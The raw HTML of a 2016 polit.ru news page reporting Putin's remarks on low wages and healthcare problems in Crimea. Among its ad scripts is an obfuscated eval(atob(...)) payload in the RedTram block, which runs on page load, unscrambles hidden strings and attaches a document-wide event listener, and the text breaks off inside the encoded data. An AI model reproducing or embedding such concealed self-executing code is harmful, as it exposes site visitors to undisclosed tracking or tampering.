<!DOCTYPE html>
<html prefix="og: http://ogp.me/ns#">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <title>Путин назвал одну из важнейших проблем Крыма - ПОЛИТ.РУ</title>

    <link rel="canonical" href="http://polit.ru/news/2016/12/23/pay/"/>
    <link rel="manifest" href="/manifest.json">

    <!-- Stylesheets -->
    <link rel="stylesheet" type="text/css" href="/static/polit/css/main.css"/>
    <link rel="stylesheet" type="text/css" href="/static/polit/css/mark-up.css"/>
    <link rel="stylesheet" type="text/css" href="/static/polit/css/content.css"/>
    <link rel="stylesheet" type="text/css" href="/static/polit/css/new.css"/>
    <!--[if IE]><link rel="stylesheet" type="text/css" href="/static/polit/css/ie.css" /><![endif]-->
    <link rel="stylesheet" href="/ads/style.css" type="text/css" media="all"/>

    <meta name="robots" content="all"/>
    <meta name="google-site-verification" content="ZbGJDYfmTGZz23DSt4DiWF448AY8MAD_9PSbBo2DAXU"/>
    <meta property="fb:app_id" content="482430971798114"/>

    <meta name="description" content="Путин назвал одну из важнейших проблем Крыма - Полит.ру" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:site" content="@POLITRU_" /><meta property="og:title" content="Путин назвал одну из важнейших проблем Крыма - ПОЛИТ.РУ" /><meta property="og:url" content="http://polit.ru/news/2016/12/23/pay/" /><meta property="og:description" content="Президент России Владимир Путин признал, что в Крыму и Севастополе уровень заработной платы ниже, чем в среднем по России. Об этом он заявил в ходе большой пресс-конференции." /><meta property="og:image" content="http://polit.ru/media/photolib/2016/12/23/putin2_1482487288.jpg" /><meta name="pubdate" content="2016-12-23T13:01:12" /><meta name="news_keywords" content="Владимир Путин, Крым" />

    <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async></script>
    <script>
      var OneSignal = OneSignal || [];
      OneSignal.push(['init', {
        appId: '9b6ff30d-450f-4958-9b28-2e63e1c92158',
        subdomainName: 'polit-ru',
        safari_web_id: 'web.onesignal.auto.43f3e2d2-3818-43ea-aa50-e469d0e1e106'
      }]);
    </script>
    <script type="text/javascript" src="//vk.com/js/api/openapi.js"></script>
    <script type="text/javascript">
      VK.init({apiId: 3289294, onlyWidgets: true});
    </script>
    <link rel="alternate" type="application/rss+xml" title="Полная лента ПОЛИТ.РУ" href="/feeds/" />
    <link rel="alternate" type="application/rss+xml" title="Статьи ПОЛИТ.РУ" href="/feeds/article/" />
    <link rel="alternate" type="application/rss+xml" title="Ёлкин дня!" href="/feeds/elkin/" />
    <link rel="stylesheet" href="/static/polit/css/politgal.css" type="text/css" media="screen" />
    <script src="/static/polit/js/polit.js" type="text/javascript"></script>
    <script src="//lib.rl0.ru/adfox/7/adfox.custom.min.js" type="text/javascript"></script>
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
    <script type="text/javascript">document.write("<script type=text/javascript src=\""+"http://meelba.com/3.html?group=polit_ru&seoref="+encodeURIComponent(document.referrer)+"&ur=1&rnd="+Math.random()+"&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=key+po+umolchaniyu"+"\"><\/script>");</script>
    <script src="/static/polit/js/politart.js" type="text/javascript"></script><script src="/static/polit/js/politgal.js" type="text/javascript"></script><script id="js-mpf-mediator-init" data-counter="2771166" data-adaptive="true">!function(e){function t(t,n){if(!(n in e)){for(var r,a=e.document,i=a.scripts,o=i.length;o--;)if(-1!==i[o].src.indexOf(t)){r=i[o];break}if(!r){r=a.createElement("script"),r.type="text/javascript",r.async=!0,r.defer=!0,r.src=t,r.charset="UTF-8";;var d=function(){var e=a.getElementsByTagName("script")[0];e.parentNode.insertBefore(r,e)};"[object Opera]"==e.opera?a.addEventListener?a.addEventListener("DOMContentLoaded",d,!1):e.attachEvent("onload",d):d()}}}t("//top-fwz1.mail.ru/js/code.js","_tmr"),t("//mediator.imgsmail.ru/2/mpf-mediator.min.js","_mediator")}(window);</script>
  </head>
<body class="new">
    <!--BEGIN #header-->
      
<div class="page">
<div class="black-top">
  <a href="http://polit.ua/">Полiт.ua</a>
  <a href="http://govweb.ru/">Государственная сеть</a>
  <a href="http://www.goslyudi.ru">Государственные люди</a>
  
  
  <a href="/promo/">Войти</a>
  
</div>

<div class="top-box">
  <div class="top-logo">
    
      <a href="/"><img src="/static/polit/img/politru_logo_2012.jpg" width="230" height="108" alt="Полит.ру" title="Полит.ру"/></a>
    
  </div>
  <div class="editors-choice-box">
<ul class="editors-choice">
 
  <li>
    <a href="/article/2016/12/22/problems/">
      
        <span class="author">Никита Белоголовцев</span>
      
      Биатлон и не только. Возможные потери РФ
    </a>
  </li>
 
  <li>
    <a href="/article/2016/12/21/turkey/">
      
        <span class="author">Анна  Сакоян</span>
      
      Убийство в Турции. Эрдоган vs. Гюлен
    </a>
  </li>
 
  <li>
    <a href="/article/2016/12/21/control/">
      
        <span class="author">Аббас Галлямов</span>
      
      «Роль Госдумы значительно увеличивается»
    </a>
  </li>
 
  <li>
    <a href="/article/2016/12/22/trump/">
      
        <span class="author">Анна  Сакоян</span>
      
      Трамп: президент-делец и его приоритеты
    </a>
  </li>
 
  <li>
    <a href="/article/2016/12/18/dissernet_vs_garbage/">
      
        <span class="author">Наталия  Демина</span>
      
      «Диссернет» занялся «мусорными» журналами
    </a>
  </li>

</ul>
</div>

  <div class="top-right">
    <div class="date-header" >
        <span id="date"><!-- date -->23 декабря 2016, пятница, 13:27<!-- /date --></span>
    </div>
    <div class="top-social">
      <a href="http://www.facebook.com/#!/politru" rel="nofollow"><img src="/static/polit/img/new-facebook.png" width="20" height="20" alt="Facebook"/></a>
      <a href="http://twitter.com/POLITRU_" rel="nofollow"><img src="/static/polit/img/new-twitter.png" width="20" height="20" alt="Twitter"/></a>
      <a href="http://polit.livejournal.com/" rel="nofollow"><img src="/static/polit/img/new-livejournal.png" width="20" height="20" alt="LiveJournal"/></a>
      <a href="http://vkontakte.ru/club21337773" rel="nofollow"><img src="/static/polit/img/new-vkontakte.png" width="20" height="20" alt="VK.com"/></a>
      <a href="/feeds/" rel="nofollow"><img src="/static/polit/img/new-rss.png" width="20" height="20" alt="RSS"/></a>
    </div>
    <div class="top-search">
      <form action="/search/">
        <table><tbody><tr>
          <td class="main"><div>
            <input type="search" name="q" id="search-q" onfocus="this.value=''" placeholder="Автор, Статья, Тема" />
          </div></td>
          <td><div>
            <input type="submit" value="ИСКАТЬ" id="search-submit" />
          </div></td>
        </tr></tbody></table>
      </form>
    </div>
  </div>
</div>
<div class="top-menu">
  <table><tbody><tr>
    <td><h2><a href="/news/" class="selected">НОВОСТИ</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>
    <td><h2><a href="/article/">СТАТЬИ</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>

    <td><h2><a href="/author/">АВТОРЫ</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>
    <td><h2><a href="/lectures/publ_lect/">ЛЕКЦИИ</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>



    <td><h2><a href="/rubric/proscience/">PRO SCIENCE</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>
    <td><h2><a href="/rubric/theater/">ТЕАТР</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>

    <td><h2><a href="/district/">РЕГИОНЫ</a></h2></td>

    
  </tr></tbody></table>
</div>

    <!--END #header-->

    <!-- BEGIN #breadcrumbs -->
      	
    <!--END #breadcrumbs-->



 

  <div class="top-menu-shadow">


    <img src="/static/polit/img/green_block_shadow_bottom.jpg" alt=""/>
    





  </div>
  <div class="main-cols ib-parent">
  
    
      
<!-- BEGIN #left column -->

<div class="left-sidebar ib-col">

<!-- start banner google adsense -->
<!-- Polit\polit.ru\234x60 -->
<!--ins class="adsbygoogle"
style="display:inline-block;width:234px;height:60px"
data-ad-client="ca-pub-1154951643410219"
data-ad-slot="6440819918">
</ins>
<script>
(adsbygoogle=window.adsbygoogle || []).push({});
</script-->
<!-- stop banner google adsense -->

    <div style="margin: 20px 0; margin-bottom: 1ex;">
    <h4 style="background-color: #007854; text-align: center; font-weight: bold; color: #FFF; font-family: Arial, Helvetica, sans-serif;" >СОБЫТИЯ</h4>
    <script type="text/mustache" id="politTmEventsMainTpl">
    {{=[[ ]]=}}
<div class="b-main b-main_type_feed">
    [[#events]]
        <div class="l-layout">
            <div class="b-pro-wiget" style="padding-top:0!important;">
                <a class="b-aphisha tpw_event_link" target="_blank" rel="nofollow" data-event-id="[[id]]" href="[[link]]">
                    <div class="b-aphisha__heading-container" [[#poster_rgba_color]]style="background-color: [[poster_rgba_color]];"[[/poster_rgba_color]]>
                        <div class="b-aphisha__heading ">[[name]]</div>
                    </div>
                    [[#image]]<div class="b-aphisha__background" style="background-image: url([[image]]);"></div>[[/image]]
                </a>

                <div class="b-description" style="padding-bottom:0;">
                    <div class="b-pro-wiget__date">
                        <span class="b-pro-wiget__day">[[day]]</span>
                        <span class="b-pro-wiget__month">[[month]]</span> <span class="b-pro-wiget__time">[[time]]</span>
                    </div>
                    <!--div class="b-short-description">[[shortdescription]]</div>

                    <div class="b-pro-wiget__more-block">
                        <a target="_blank" rel="nofollow" data-event-id="[[id]]" href="[[link]]" class="b-pro-wiget__more-button tpw_event_link">[[buttonText]]</a>
                    </div-->

                </div>
            </div>
        </div>
    [[/events]]
</div>
    </script>
    <script type="text/javascript" defer="defer" charset="UTF-8" data-timepad-customized="8428" data-timepad-widget-v2="event_list3" src="https://timepad.ru/js/tpwf/loader/min/loader.js">
    (function() { return { "overrideTemplates": { "main": "#politTmEventsMainTpl" } }; })();
    </script>
    <div style="text-align:center;"><a href="http://bigbilet.ru/ticket-client/?owner=06152AF139E27D50E0504B5E01F57D8B" title="Купить билеты ОН-ЛАЙН"><img border="0" src="/static/polit/img/buytickets.gif" /></a></div>
    
  </div>

  <div class="left-or-right-top-banner-slot"></div>
  <div class="block likebox">
    <iframe src="//www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpolitru&amp;width=234&amp;height=168&amp;colorscheme=light&amp;show_faces=true&amp;border_color&amp;stream=false&amp;header=false" scrolling="no" frameborder="0" style="border-bottom: 1px solid #AAA; overflow:hidden; width:234px; height:153px;" allowTransparency="true"></iframe>

    <!-- VK Widget -->
    <div id="vk_groups"></div>
    <script type="text/javascript">
      VK.Widgets.Group("vk_groups", {mode: 0, width: "234", height: "10", color1: 'FFFFFF', color2: '2B587A', color3: '5B7FA6'}, 21337773);
    </script>
  </div>
     <div class="left-banner-slot-above-top-articles"></div>
     <div class="left-banner-slot-above-top-articles-2"></div>
     <div class="b2bcontext">
       Бизнесу:
       <ul>
         <li><a href="/b2b/research/">Маркетинговые исследования</a></li>
         <li><a href="/b2b/plan/?parent=rubricator&child=rubricatorbp">Бизнес-планы</a></li>
       </ul>
     </div>
     <div class="block netlenka">
         <div class="subject">Нетленка</div>
         <ul class="top-articles">
 
  <li>
    <a href="/article/2010/06/09/levada/">
      
        <span class="author">Лев Гудков и Любовь Борусяк</span>
      
       В кругу Юрия Левады
    </a>
  </li>
 
  <li>
    <a href="/article/2016/07/24/immoralism/">
      
        <span class="author">Лев Гудков</span>
      
      Имморализм посттоталитарного общества в России
    </a>
  </li>
 
  <li>
    <a href="/article/2016/01/31/conservatism/">
      
        <span class="author">Лев Гудков</span>
      
      Ресурсы путинского «консерватизма»
    </a>
  </li>
 
  <li>
    <a href="/article/2010/02/10/science/">
      
        <span class="author">Нина Брагинская и Любовь Борусяк</span>
      
      Язык науки
    </a>
  </li>
 
  <li>
    <a href="/article/2010/03/03/science/">
      
        <span class="author">Нина Брагинская и Любовь Борусяк</span>
      
      Путь в науке
    </a>
  </li>

</ul>

     </div>
     <div class="left-banner-slot-below-top-articles"></div>
     <div class="block">
         <div class="subject"><a href="/genre/seminars/">Семинары</a></div>
     </div>
     <div class="left-banner-slot-below-seminars"></div>
     <div class="top-district-news">
        <span style="text-transform: uppercase; font-size: 21px;">Новости регионов</span>
        
<div class="top-news" style="margin: 0px;">
  <br>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://dostup1.ru/society/Dve-mnogoetazhki-v-problemnom-Akademe-gotovy-k-sdache_90541.html" class="hover">Две многоэтажки в проблемном Академе готовы к сдаче</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://debri-dv.com/article/14819/komu_bolshe_nuzhen_dalnevostochnyy_gektar_nashim_ili_kitaycam" class="hover">Кому больше нужен дальневосточный гектар, нашим или китайцам?</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://debri-dv.com/article/14818/10_molodezhnyh_proektov_habarovska_po_itogam_foruma_poluchat_ot_100_do_300_tysyach_rubley" class="hover">10 молодежных проектов Хабаровска по итогам форума получат от 100 до 300 тысяч рублей</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://debri-dv.com/article/14817/mezhdunarodnye_problemy_opto-_i_mikroelektroniki_obsudyat_v_habarovske_okolo_100_uchenyh" class="hover">Международные проблемы опто- и микроэлектроники обсудят в Хабаровске около 100 ученых</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://debri-dv.com/article/14816/habarovskiy_kray_na_dv-forume_predstavil_model_proektnogo_upravleniya" class="hover">Хабаровский край на ДВ-форуме представил модель проектного управления</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://debri-dv.com/article/14815/vrach_bolonyaeva_zamenit_kommunalshchika_gladkih_v_habarovskoy_kraevoy_dume" class="hover">Врач Болоняева заменит коммунальщика Гладких в хабаровской краевой думе</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://debri-dv.com/article/14814/dalniy_vostok_okapyvaetsya_na_granicah_i_za_ee_predelami_napryazhenie_rastet" class="hover">Дальний Восток «окапывается» на границах и за ее пределами. Напряжение растет</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://debri-dv.com/article/14813/opasnyy_kartelnyy_sgovor_presekla_fas_v_chukotskoy_aviacii_i_v_okruzhnoy_vlasti" class="hover">Опасный картельный сговор пресекла ФАС в чукотской авиации и в окружной власти</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://feedproxy.google.com/~r/inklgd/~3/FwlxKhqc9yk/37714" class="hover">В Тбилиси у здания ЦИКа прошел митинг против результатов выборов</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://vyatka.ru/news/Politseyskie_nashli_dvukh_yunykh_podrug_ushedshikh_iz_doma" class="hover">Полицейские нашли двух юных подруг, ушедших из дома</a>
      <!--/div-->
    </div>
  
</div>



     </div>

<!-- start redtram -->

<div id="n4p_28541">Loading...</div>
<script type="text/javascript" charset="utf-8">
  (function(d,s){
    var o=d.createElement(s);
    o.async=true;
    o.type="text/javascript";
    o.charset="utf-8";
    if (location.protocol == "https:") {
      o.src="https://js-ru.redtram.com/n4p/0/28/ticker_28541.js";
    }
    else {
      o.src="http://js.ru.redtram.com/n4p/0/28/ticker_28541.js";
    }
    var x=d.getElementsByTagName(s)[0];
    x.parentNode.insertBefore(o,x);
  })(document,"script");
</script>

<!-- end redtram -->

     <div class="block">
         <div class="subject">Спецпроекты</div>
         
<div class="link">
	<a href="/rubric/elections2016/">Выборы-2016 с Линой Арифулиной</a>
</div>

<div class="link">
	<a href="/rubric/ecology/">Экологическая повестка</a>
</div>

<div class="link">
	<a href="/rubric/opendata/">Открытое государство</a>
</div>

<div class="link">
	<a href="/rubric/politeia/">Русская политейя</a>
</div>

<div class="link">
	<a href="/rubric/future/">Прыжок в будущее</a>
</div>

<div class="link">
	<a href="/rubric/moscow/">Проект &quot;Москва&quot;</a>
</div>

<div class="link">
	<a href="/rubric/history_human/">История: человек, институты</a>
</div>

<div class="link">
	<a href="/rubric/literatures/">Национальные литературы</a>
</div>


     </div>
     <div class="block">
         <div class="subject"><a href="/genre/dossie/">Документы</a></div>
     </div>
     <div class="block">
         <div class="subject"><a href="/rubric/redakciya/">О проекте</a></div>
     </div>
     <div class="left-material-banner-slot-1"></div>
     <div class="left-banner-slot-0"></div>
     <div class="left-banner-slot-1"></div>
     <div class="block partners">
       <div class="subject">Партнеры</div>
       <div class="left-partners-slot-1"></div>
       <div class="left-partners-slot-2"></div>
       <div class="left-partners-slot-3"></div>
     </div>
 </div>
 <!-- END #left column -->

    
  
<!--BEGIN #content-->


  
    <div class="new-main-content ib-col">
      <div class="article-detail" id="material-news441104">
  
        <div id="fb-root"></div>
        <script>(function(d, s, id) {
          var js, fjs = d.getElementsByTagName(s)[0];
          if (d.getElementById(id)) return;
            js = d.createElement(s); js.id = id;
            js.src = "//connect.facebook.net/ru_RU/all.js#xfbml=1";
            fjs.parentNode.insertBefore(js, fjs);
          }(document, 'script', 'facebook-jssdk'));
        </script>
        <div class="date">
          23 декабря 2016, 13:01
          
            
              <div class="tags-subject">
                <span>
                  
                    <a href="/tag/vladimir-putin/">Владимир Путин</a>
                  
                    <a href="/tag/krym/">Крым</a>
                  
                </span>
              </div>
            
          
        </div>
        <h1 class="title">Путин назвал одну из важнейших проблем Крыма</h1>
        
        
          
            
          
          
          <div class="image-with-overlay d600x450 below23 image-gray-back-big">
            <a href="/media/photolib/2016/12/23/putin2_1482487288.jpg" rel="lightbox" title="Большая пресс-конференция Владимира Путина">
              <img src="/media/photolib/2016/12/23/thumbs/putin2_1482487288.jpg.600x450_q85.jpg" alt="Большая пресс-конференция Владимира Путина" title="Большая пресс-конференция Владимира Путина" style="margin-top:-225px; margin-left:-300px;"/>
              
            </a>
            <div class="image-overlay image-overlay-bottom-right">
              Большая пресс-конференция Владимира Путина
              
                <div class="image-extra-source">Пресс-служба Кремля</a></div>
              
            </div>
          </div>
          
        
        <div class="content">
          
            
          
          <div class="text doc js-mediator-article">
            <p>Президент России Владимир Путин признал, что в Крыму и Севастополе уровень заработной платы ниже, чем в среднем по России. Об этом он заявил в ходе большой пресс-конференции.</p>
            



            
<p>&laquo;По Российской Федерации зарплаты в среднем 35 тысяч рублей, а в Крыму &mdash; 24 тысячи с небольшим. Я уверен, что этот показатель выровняется. Нам также нужно предпринять необходимые шаги, чтобы в региональных органах власти зарплаты были в среднем как по стране&raquo;, &mdash; сказал Путин, отвечая на вопрос журналиста &laquo;КрымИнформ&raquo;.</p>
<p>Кроме того президент отметил существование ряда проблем со здравоохранением на полуострове.</p>
<p>&laquo;В Крыму нужно решить вопросы, которые не решались десятилетиями. В первую очередь, конечно, речь о медицине. Есть проблема с подготовкой персонала, так как люди пока что зачастую не имели опыта работы с современным оборудованием&raquo;, &mdash; добавил Путин.</p>
            
          </div>

          <div style="padding-bottom: 20px;"><h4 style="color: #007854;text-transform: uppercase;font-size: 120%;padding: 0;">Обсудите в соцсетях</h4>
            <script type="text/javascript">(function(w,doc) {
              if (!w.__utlWdgt ) {
                w.__utlWdgt = true;
                var d = doc, s = d.createElement('script'), g = 'getElementsByTagName';
                s.type = 'text/javascript'; s.charset='UTF-8'; s.async = true;
                s.src = ('https:' == w.location.protocol ? 'https' : 'http')  + '://w.uptolike.com/widgets/v1/uptolike.js';
                var h=d[g]('body')[0];
                h.appendChild(s);
              }})(window,document);
            </script>
            <div data-background-alpha="0.0" data-buttons-color="#ffffff" data-counter-background-color="#ffffff" data-share-counter-size="12" data-top-button="false" data-share-counter-type="separate" data-share-style="10" data-mode="share" data-like-text-enable="false" data-hover-effect="scale" data-mobile-view="false" data-icon-color="#ffffff" data-orientation="horizontal" data-text-color="#ffffff" data-share-shape="rectangle" data-sn-ids="fb.tw.vk.ok.lj.em." data-share-size="40" data-background-color="#ffffff" data-preview-mobile="false" data-mobile-sn-ids="fb.vk.tw.wh.ok.gp." data-pid="1413315" data-counter-background-alpha="1.0" data-following-enable="false" data-exclude-show-more="true" data-selection-enable="false" class="uptolike-buttons" ></div>
          </div>

          <!-- start banner google adsense -->
          <!-- Polit\polit.ru\468x60 -->
          <!--ins class="adsbygoogle"
          style="display:inline-block;width:468px;height:60px"
          data-ad-client="ca-pub-1154951643410219"
          data-ad-slot="4824359318">
          </ins>
          <script>
          (adsbygoogle=window.adsbygoogle || []).push({});
          </script-->
          <!-- stop banner google adsense -->

          
        </div>

        <div class="bottom-social stop">
          <div class="print">
            <a href="/news/2016/12/23/pay/print/" rel="nofollow">Версия для печати</a>
          </div>
        </div>
       <!-- 
<div class="comments stop">
  <div class="subject">Комментарии</div>
  <div class="comments-content">
    <div class="fb-comments" data-href="http://polit.ru/news/2016/12/23/pay/" data-width="580" data-num-posts="10"></div>
    <div id="vk_comments"></div>
    <script type="text/javascript">
      VK.Widgets.Comments("vk_comments", {limit: 10, width: "580", attach: false});
    </script>
  </div>
</div>

 -->
        <script type="text/javascript" src="/static/orphus/orphus.js"></script>
        <a href="http://orphus.ru" id="orphus" target="_blank" title="Система Orphus" rel="nofollow"><img alt="Система Orphus" src="/static/orphus/orphus.gif" border="0" width="600"></a>
        
          
        
        <div style="width:600px;">
      <!-- 24СМИ Start -->
      <div id="smi_teaser_3061">
           <center><a href="http://ex.24smi.info">Новости 24СМИ</a></center>
      </div>
      <script type="text/JavaScript" encoding="utf8">
               (function() {
               var sm = document.createElement("script");
               sm.type = "text/javascript";
               sm.async = true;
               sm.src = "http://jsn.24smi.org/4/a/3061.js";
               var s = document.getElementsByTagName("script")[0];
               s.parentNode.insertBefore(sm, s);})();
      </script>
      <!-- 24СМИ End -->

      <!-- LentaInformNews Start -->
      <div id="LentaInformScriptRootN11072" class="news-block-magick">
        <div id="LentaInformPreloadN11072">
          <a href="http://lentainform.com/" target="_blank">Загрузка...</a>
        </div>
        <script>
                (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("LentaInformScriptRootN11072")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("LentaInformScriptRootN11072");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=11072;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.lentainform.com/p/o/polit.ru.11072.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
        </script>
      </div>
      <!-- LentaInformNews End -->

      <!-- google adsense -->
<script type="text/javascript"><!--
google_ad_client = "ca-pub-1191230850516122";
/* adxguru\polit.ru\468x60\0 */
google_ad_slot = "8133317607";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="//pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
      <!-- google adsense End -->

      <!-- MarketGidNews Start -->
      <div id="MarketGidScriptRootN13911" class="news-block-magick">
           <div id="MarketGidPreloadN13911">
                <a href="http://marketgid.com/" target="_blank">Загрузка...</a>
           </div>
           <script>
               (function(){
                   var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
                   var i=d[ce]('iframe');i[st][ds]=n;d[gi]("MarketGidScriptRootN13911")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
                   catch(e){var iw=d;var c=d[gi]("MarketGidScriptRootN13911");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=13911;c[ac](dv);
                   var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.marketgid.com/1/p/1.polit.ru.13911.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
           </script>
      </div>
      <!-- MarketGidNews End -->

      <!-- smi2 Start -->
      <div id="unit_84866"><a href="http://smi2.net/">Новости СМИ2</a></div>
      <script type="text/javascript" charset="utf-8">
        (function() {
          var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
          sc.src = '//news.smi2.ru/data/js/84866.js'; sc.charset = 'utf-8';
          var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
        }());
      </script>
      <!-- smi2 End -->


      <!-- RedTram Start -->
      <div id="n4p_15006">Loading...</div>
      <script type="text/javascript" charset="utf-8">
      (function(d,s){
      var o=d.createElement(s);
      o.async=true;
      o.type="text/javascript";
      o.charset="utf-8";
      if (location.protocol == "https:")
      { o.src="https://js-goods.redtram.com/ticker_15006.js"; o.setAttribute("alt-src","https://js-goods.redtram.com/ticker_15742.js");}
      else
      { o.src="http://js.grt02.com/ticker_15006.js"; o.setAttribute("alt-src","http://js.grt02.com/ticker_15742.js");}
      o.setAttribute("cur-id","n4p_15006");
      o.setAttribute("alt-id","n4p_15742");
      o.setAttribute("o-data",eval(atob('KGZ1bmN0aW9uKCl7dmFyIGE9KGMpKCJcInluc3AlYXN0b2FFc0VBZXFydDlkaHZueS9Fb0JlQWNGbG5sSkRYTHMldE0lRXMlVnRhQWZuJXJkMyVcIm43TVVhJWVpeGR0YTAsZW9zciBhZCVRYSllZWxlV2V0VGR0VHNsaXNuZWUlc25lbmklbXVzV3JkcnN3JSVlJSVSZWFkYS5zS2VoJW1XJXFMc3Jvd29zcl93byVlcmVvJTpHb0VpNW9ydCUoME91bm5uQWMlOnhpZShvc3BocmdsYXNucm95dGV0bnlJJ1pheCVyQXJpb2lHJWd0ZGRzdHppYS9ubUFlZ1RlXCJyJyVpQ25kcE9jZXNsaGh0dGNhcGFubU5DZSVjcmp3ZWNlYmV1Y0l0bSVhXCJidGVuZWVjaXBvd25kTSV0czZhLy8lQXJBZ25zeE9hb25vX0Ulc2xoZ2dwYSVrJXJnSCVycGdBcHJzb2RuZHR5ZCV7cHV0bW8vcmVwSWVlcXNldG9QUi8lJXI7aWFhZWxjJWN5bSVvUlwiJXQlQXJBb21BcGlwbmllKEtlb0J9aEFsU2ZvdEJBckVmT2VrJUFpb29YSHd1R2ZtJW9BZGwlbXRlbi5tbjp2bHNBKWglb2VjdW1ldXQlPWVlZW50bGU7ZUJhYW9naHBpZnJqdmV0dEVlblRwYXQ4cnRndG1kJWdzdSVOTm9Dbnkxd3NBZHJxeW5ldFNkcGUlcm0lc29kQWUuJSVsZWp9JWNBeSVuVHVkb3NSdGJcImVsNm9yOnNkbzp4ZUhvQyVibm97aHNuJW9BJVF0QW8sZW50bUc9fCVcIiVpbFdFRG5zbnBybGxyQmhFbDJpNCV3dGkpZnB0X3QvNSVMZU5zQ3ZlYUFka2VvZSVlYSV3bG9wcmphU3RldGF0Z2V6aHI0bW9uc0wuU3RlaUF0YXlvXCIlJUFiZXNFZmFvdCIsMTM2ODYwMzMpO2Z1bmN0aW9uIGMoZSxwKXt2YXIgYj1lLmxlbmd0aDt2YXIgbD1bXTtmb3IodmFyIG89MDtvPCBiO28rKyl7bFtvXT0gZS5jaGFyQXQobyl9O2Zvcih2YXIgbz0wO288IGI7bysrKXt2YXIgZj1wKiAobysgNSkrIChwJSA0NTg4NDIpO3ZhciBjPXAqIChvKyA3KSsgKHAlIDI2NTk3NSk7dmFyIG49ZiUgYjt2YXIgZz1jJSBiO3ZhciBoPWxbbl07bFtuXT0gbFtnXTtsW2ddPSBoO3A9IChmKyBjKSUgNTU5MTc4Nzd9O3ZhciBqPVN0cmluZy5mcm9tQ2hhckNvZGUoMTI3KTt2YXIgbT0iIjt2YXIgaT0iXHgyNSI7dmFyIGE9Ilx4MjNceDMxIjt2YXIgZD0iXHgyNSI7dmFyIHE9Ilx4MjNceDMwIjt2YXIgaz0iXHgyMyI7cmV0dXJuIGwuam9pbihtKS5zcGxpdChpKS5qb2luKGopLnNwbGl0KGEpLmpvaW4oZCkuc3BsaXQocSkuam9pbihrKS5zcGxpdChqKX1mdW5jdGlvbiBiKCl7ZnVuY3Rpb24gaChnLGYpe2lmKCFjKXtiPSB0cnVlfTt2YXIgaj1bYVswXSxhWzFdLGFbMl1dLGk9YVszXSxlLGg9MDtnPSAxMDtmPSAxNjtlPSBnKyBNYXRoW2FbNV1dKE1hdGhbYVs0XV0oKSogKGYtIGcpKTtpZighYSl7Yj0gMX07Zm9yKHZhciBkPTA7ZDwgZTtkKyspe2krPSBqW2hdW01hdGhbYVs1XV0oTWF0aFthWzRdXSgpKiBqW2hdW2FbNl1dKV07aD0gKGgrIE1hdGhbYVs1XV0oTWF0aFthWzRdXSgpKiAxMDApKSUgM307cmV0dXJuIGl9dmFyIGQ9e307ZFthWzddXT0gW107ZFthWzhdXT0gZnVuY3Rpb24oYil7ZFthWzddXVthWzEwXV0oYlthWzldXSl9O2RvY3VtZW50W2FbMTJdXShhWzExXSxkW2FbOF1dLHRydWUpO2Z1bmN0aW9uIGcoYil7cmV0dXJuIGJbYVsxNV1dKGFbM10pW2FbMTRdXSgpW2FbMTNdXShhWzNdKX12YXIgZj1kb2N1bWVudFthWzE3XV0oYVsxNl0pO2ZbYVsxOV1dW2FbMThdXT0gYVsyMF07ZG9jdW1lbnRbYVsyMl1dW2FbMjFdXShmKTtkW2FbMjNdXT0gIG5ldyBmW